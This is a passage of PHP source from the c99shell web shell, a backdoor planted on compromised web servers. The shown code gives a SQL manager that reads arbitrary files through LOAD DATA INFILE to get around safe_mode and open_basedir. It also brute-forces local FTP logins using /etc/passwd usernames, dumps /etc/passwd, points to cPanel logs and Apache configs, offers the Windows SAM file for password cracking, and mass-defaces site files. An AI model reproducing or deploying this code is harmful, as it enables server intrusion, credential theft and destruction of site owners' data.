611 $wd = false;
612 $wdt = "<font color=\"red\">[ Read-Only ]</font>";
613 echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
614}
615$free = diskfreespace($d);
616if (!$free) {$free = 0;}
617$all = disk_total_space($d);
618if (!$all) {$all = 0;}
619$used = $all-$free;
620$used_percent = round(100/($all/$free),2);
621echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
622if (count($quicklaunch) > 0)
623{
624 foreach($quicklaunch as $item)
625 {
626 $item[1] = str_replace("%d",urlencode($d),$item[1]);
627 $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
628 echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ";
629 }
630}
631$letters = "";
632if ($win)
633{
634 $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
635 $v = explode("/",$d);
636 $v = $v[0];
637 foreach ($abc as $letter)
638 {
639 if (is_dir($letter.":/"))
640 {
641 if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
642 else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
643 }
644 }
645 if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
646}
647?></p></td></tr></table><br><?php
648if ((!empty($donated_html)) and (in_array($act,$donated_act)))
649{
650 ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
651}
652?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
653if ($act == "") {$act = $dspact = "ls";}
654if ($act == "sql")
655{
656 $sql_surl = $surl."act=sql";
657 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
658 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
659 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
660 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
661 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
662 $sql_surl .= "&";
663 ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
664 if ($sql_server)
665 {
666 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
667 $err = mysql_error();
668 @mysql_select_db($sql_db,$sql_sock);
669 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
670 }
671 else {$sql_sock = false;}
672 echo "<b>SQL Manager:</b><br>";
673 if (!$sql_sock)
674 {
675 if (!$sql_server) {echo "NO CONNECTION";}
676 else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
677 }
678 else
679 {
680 $sqlquicklaunch = array();
681 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
682 if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
683 else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
684 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
685 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
686 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
687 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
688
689 echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
690 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
691 echo "</center>";
692 }
693 echo "</td></tr><tr>";
694 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password </td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
695 else
696 {
697 //Start left panel
698 if (!empty($sql_db))
699 {
700 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
701 $result = mysql_list_tables($sql_db);
702 if (!$result) {echo mysql_error();}
703 else
704 {
705 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
706 $c = 0;
707 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
708"; mysql_free_result($count); $c++;}
709 if (!$c) {echo "No tables found in database.";}
710 }
711 }
712 else
713 {
714 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
715 $result = mysql_list_dbs($sql_sock);
716 if (!$result) {echo mysql_error();}
717 else
718 {
719 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
720 echo "<option value=\"\">Databases (...)</option>
721";
722 $c = 0;
723 while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
724"; $c++;}
725 }
726 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
727 }
728 //End left panel
729 echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
730 //Start center panel
731 if ($sql_db)
732 {
733 echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
734 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
735 echo "</b></center>";
736 $acts = array("","dump");
737 if ($sql_act == "query")
738 {
739 echo "<hr size=\"1\" noshade>";
740 if ($submit)
741 {
742 if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
743 }
744 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
745 if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form>";}
746 }
747 if (in_array($sql_act,$acts))
748 {
749 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
750 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
751 if ($sql_act == "newtpl")
752 {
753 echo "<b>";
754 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
755 }
756 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
757 }
758 elseif ($sql_act == "dump")
759 {
760 $set = array();
761 $set["sock"] = $sql_sock;
762 $set["db"] = $sql_db;
763 $dump_out = "print";
764 if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
765 elseif ($dump_out == "download")
766 {
767 @ob_clean();
768 header("Content-type: c99shell");
769 header("Content-disposition: attachment; filename=\"".$f."\";");
770 $set["print"] = 1;
771 $set["nl2br"] = 1;
772 }
773 $set["file"] = $dump_file;
774 $set["add_drop"] = true;
775 $ret = mysql_dump($set);
776 if ($dump_out == "download") {exit;}
777 }
778 else
779 {
780 $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());
781 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
782 echo "<tr>";
783 echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
784 echo "<td><center><b>Table</b></center></td>";
785 echo "<td><b>Rows</b></td>";
786 echo "<td><b>Type</b></td>";
787 echo "<td><b>Created</b></td>";
788 echo "<td><b>Modified</b></td>";
789 echo "<td><b>Size</b></td>";
790 echo "<td><b>Action</b></td>";
791 echo "</tr>";
792 $i = 0;
793 $tsize = $trows = 0;
794 while ($row = mysql_fetch_array($result, MYSQL_NUM))
795 {
796 $tsize += $row["5"];
797 $trows += $row["5"];
798 $size = view_size($row["5"]);
799 echo "<tr>";
800 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
801 echo "<td> <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a> </td>";
802 echo "<td>".$row[3]."</td>";
803 echo "<td>".$row[1]."</td>";
804 echo "<td>".$row[10]."</td>";
805 echo "<td>".$row[11]."</td>";
806 echo "<td>".$size."</td>";
807 echo "<td>
808 <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
809 <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
810<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>
811</td>";
812 echo "</tr>";
813 $i++;
814 }
815 echo "<tr bgcolor=\"000000\">";
816 echo "<td><center><b>»</b></center></td>";
817 echo "<td><center><b>".$i." table(s)</b></center></td>";
818 echo "<td><b>".$trows."</b></td>";
819 echo "<td>".$row[1]."</td>";
820 echo "<td>".$row[10]."</td>";
821 echo "<td>".$row[11]."</td>";
822 echo "<td><b>".view_size($tsize)."</b></td>";
823 echo "<td></td>";
824 echo "</tr>";
825 echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
826<option>With selected:</option>
827<option value=\"drop\" >Drop</option>
828<option value=\"empty\" >Empty</option>
829<option value=\"chk\">Check table</option>
830<option value=\"Optimize table\">Optimize table</option>
831<option value=\"Repair table\">Repair table</option>
832<option value=\"Analyze table\">Analyze table</option>
833</select> <input type=\"submit\" value=\"Confirm\"></form>";
834 mysql_free_result($result);
835 }
836 }
837 }
838 else
839 {
840 $acts = array("","newdb","serverstat","servervars","processes","getfile");
841 if (in_array($sql_act,$acts))
842 {
843 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
844 }
845 if (!empty($sql_act))
846 {
847 echo "<hr size=\"1\" noshade>";
848 if ($sql_act == "newdb")
849 {
850 echo "<b>";
851 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
852 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
853 }
854 if ($sql_act == "serverstatus")
855 {
856 $result = mysql_query("SHOW STATUS", $sql_sock);
857 echo "<center><b>Server-status variables:</b><br><br>";
858 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
859 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
860 echo "</table></center>";
861 mysql_free_result($result);
862 }
863 if ($sql_act == "servervars")
864 {
865 $result = mysql_query("SHOW VARIABLES", $sql_sock);
866 echo "<center><b>Server variables:</b><br><br>";
867 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
868 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
869 echo "</table>";
870 mysql_free_result($result);
871 }
872 if ($sql_act == "processes")
873 {
874 if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
875 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
876 echo "<center><b>Processes:</b><br><br>";
877 echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
878 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
879 echo "</table>";
880 mysql_free_result($result);
881 }
882 elseif (($sql_act == "getfile"))
883 {
884 if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
885 elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
886 elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
887 else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
888 else
889 {
890 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
891 $f = "";
892 while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
893 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
894 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
895 }
896 mysql_free_result($result);
897 if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
898 }
899 }
900 }
901 }
902 }
903 echo "</tr></table></table>";
904}
905if ($act == "mkdir")
906{
907 if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
908 echo "<br><br>";
909 $act = $dspact = "ls";
910}
911if ($act == "ftpquickbrute")
912{
913 echo "<b>Ftp Quick brute:</b><br>";
914 if ($win) {echo "This functions not work in Windows!<br><br>";}
915 else
916 {
917 function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
918 {
919 if ($fqb_onlywithsh)
920 {
921 if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
922 else {$true = true;}
923 }
924 else {$true = true;}
925 if ($true)
926 {
927 $sock = @ftp_connect($host,$port,$timeout);
928 if (@ftp_login($sock,$login,$pass))
929 {
930 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
931 ob_flush();
932 return true;
933 }
934 }
935 }
936 if (!empty($submit))
937 {
938 if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
939 $fp = fopen("/etc/passwd","r");
940 if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
941 else
942 {
943 ob_flush();
944 $i = $success = 0;
945 $ftpquick_st = getmicrotime();
946 while(!feof($fp))
947 {
948 $str = explode(":",fgets($fp,2048));
949 if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
950 {
951 $success++;
952 }
953 if ($i > $fqb_lenght) {break;}
954 $i++;
955 }
956 if ($success == 0) {echo "No success. connections!";}
957 $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
958 echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
959 }
960 }
961 else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
962 }
963}
964if ($act == "lsa")
965{
966 echo "<center><b>Server security information:</b></center>";
967 echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
968 echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
969 echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
970 if (!$win)
971 {
972 if ($nixpasswd)
973 {
974 if ($nixpasswd == 1) {$nixpasswd = 0;}
975 $num = $nixpasswd + $nixpwdperpage;
976 echo "<b>*nix /etc/passwd:</b><br>";
977 $i = $nixpasswd;
978 while ($i < $num)
979 {
980 $uid = posix_getpwuid($i);
981 if ($uid) {echo join(":",$uid)."<br>";}
982 $i++;
983 }
984 }
985 else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
986 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
987 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
988 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
989 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
990 }
991 else
992 {
993 $v = $_SERVER["WINDIR"]."\repair\sam";
994 if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
995 else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
996 }
997}
998if ($act == "mkfile")
999{
1000 if ($mkfile != $d)
1001 {
1002 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
1003 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
1004 else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
1005 }
1006 else {$act = $dspact = "ls";}
1007}
1008if ($act == "fsbuff")
1009{
1010 $arr_copy = $sess_data["copy"];
1011 $arr_cut = $sess_data["cut"];
1012 $arr = array_merge($arr_copy,$arr_cut);
1013 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
1014 else
1015 {
1016 echo "<b>File-System buffer</b><br><br>";
1017 $ls_arr = $arr;
1018 $disp_fullpath = true;
1019 $act = "ls";
1020 }
1021}
1022if ($act == "selfremove")
1023{
1024 if (!empty($submit))
1025 {
1026 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
1027 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
1028 }
1029 else
1030 {
1031 $v = array();
1032 for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
1033 $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
1034 shuffle($v);
1035 $v = join(" ",$v);
1036 echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
1037 }
1038}
1039if ($act == "massdeface")
1040{
1041 if (empty($deface_in)) {$deface_in = $d;}
1042 if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
1043 if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
1044 if (!empty($submit))
1045 {
1046 $found = array();
1047 $found_d = 0;
1048 $found_f = 0;
1049 $text = $deface_text;
1050 $text_regexp = $deface_text_regexp;
1051 if (empty($text)) {$text = " "; $text_regexp = 1;}
1052 $a = array
1053 (
1054 "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
1055 "text"=>$text, "text_regexp"=>$text_regxp,
1056 "text_wwo"=>$deface_text_wwo,
1057 "text_cs"=>$deface_text_cs,
1058 "text_not"=>$deface_text_not
1059 );
1060 $defacetime = getmicrotime();
1061 $in = array_unique(explode(";",$deface_in));
1062 foreach($in as $v) {c99fsearch($v);}
1063 $defacetime = round(getmicrotime()-$defacetime,4);
1064 if (count($found) == 0) {echo "<b>No files found!</b>";}
1065 else
1066 {
1067 $ls_arr = $found;
1068 $disp_fullpath = true;
1069 $act = $dspact = "ls";
1070 }
1071 }
1072 else
1073 {
1074 if (empty($deface_preview)) {$deface_preview = 1;}
1075 if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
1076 }
1077 echo "<form method=\"POST\">";
1078 if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
1079 echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
1080<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\"> <input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
1081<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
1082<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
1083<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
1084 <input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
1085 <input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
1086 <input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
1087<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
1088<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
1089<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
1090 if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
1091}
1092if ($act == "search")
1093{
1094 if (empty($search_in)) {$search_in = $d;}
1095 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1096 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
